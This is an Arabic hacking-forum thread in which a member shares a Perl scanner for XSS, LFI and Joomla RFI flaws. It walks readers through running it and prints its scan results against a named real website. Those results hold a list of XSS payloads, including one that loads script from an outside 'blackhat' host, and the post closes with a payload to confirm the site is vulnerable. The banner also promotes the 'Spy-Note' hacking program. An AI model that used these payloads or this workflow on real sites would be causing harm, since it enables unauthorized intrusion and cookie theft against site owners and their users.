1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. GO HacKer
    DeveloPer Plus

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    127
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50

    السلام عليكم ورحمه الله وبركاتة

    سكربت بيرل للبحث عن ثغرات

    XSS , LFI , Joomla RFI

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    [ شرح مبسط ]

    ناخذ اكواد السكربت ونفتح تكست ونلصق الاكواد فيه ونحفضه ب صيغه pl
    مثال p.pl
    ونحفضه ف اي مكان ، عن نفسي حفضته في القرص C

    [​IMG]

    [ 1 ] هو الثغرات المراد البحث عنهاَ
    [ 2 ] نضع رقم الثغره ك مثال انا اخترت رقم 1 الي هي XSS
    [ 3 ] نضع الموقع المراد فحصه بدون القيمه او ب القيمه لا مانع
    ثم انتر :{w}:

    [​IMG]

    [ 4 ] وبعد انتهاء الفحص ، نحفظه ب صيغه txt
    ومرات ينحفظ تلقائياََ
    لكن لمن تواجهه مشكله في حفظ عمله البحث
    يعمل ك التالي
    كمثال في الصوره الثانيه : انا حفظته xxs2.txt

    C:/>xss2.txt
    المسار الي حفظنا فيه
    اسم المستند
    الصيغه

    ثم نتجه ل القرص C
    ينجد المستند ب اسم xss2
    او ب اسم All

    نفتح المستند

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58='><script>alert(document.cookie)</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58&lt;script&gt;alert('Hacked by TheShow youtube.com/theshowinglok');&lt;/script&gt   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58a?<script>alert('Hacked by TheShow youtube.com/theshowinglok')</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/Hacked by TheShow youtube.com/theshowinglok/alert(a.source)</SCRIPT>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58%3Cscript%3Ealert('Hacked by TheShow')%3C/script%3E   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert('Hacked by TheShow')>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/G3n3Rall/alert(a.source)</SCRIPT>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT SRC=http://g3n3rall-blackhat.persiangig.com/XSS.JS?<B>   =>   NOT FOUND XSS Vulnerability
    بعد ما نفتح المستند بنجد كلمتين في كل سطر

    XSS Vulnerability FOUND
    تم العثور على ثغره امنيه XSS

    NOT FOUND XSS Vulnerability
    لم يتم العثور على ثغرة أمنية XSS

    طيب ناخذ الرابط الي بعده كلمه XSS Vulnerability FOUND

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer> => XSS Vulnerability FOUND
    انصح ب استبدال

    كود PHP:
    <CeNTer>G3n3Rall</CeNTer>
    بـ !!:{

    كود PHP:
    "<>'<script>alert(0)</script>
    ليصبح الرابط بهذا الشكل

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58"<>'<script>alert(0)</script>
    مصاب وظهر لنا رساله التنبيه 1


    وفقنا الله وياكم لما يحب ويرضى :{11}:
     
    جاري تحميل الصفحة...
  2. NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    647
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    مشكور عزيزي ...استمر . )5:"
     
  3. القناص
    DeveloPer Plus

    عضو منذ:
    ‏8 ديسمبر 2012
    عدد المشاركات:
    88
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    العراق
    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    بارك الله فيك يا غالي ..
     
  4. Mr.FriezA
    V • I • P

    عضو منذ:
    ‏10 مارس 2014
    عدد المشاركات:
    526
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    210
    الجنس:
    ذكر
    الإقامة:
    افضل و اطهر بقاع الارض
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    الله يوفقك وشكرا على اﻻداه يابطل:rolleyes:
     
  5. [ بارود الهكر ]
    rank
    Developer

    عضو منذ:
    ‏5 أكتوبر 2011
    عدد المشاركات:
    42
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    بيت ابوي
    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    سلمت يمنيك والله رائع
    شكرا لك وبارك الله بك
    دومك مميز اخي
    تقبل تحيتي​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...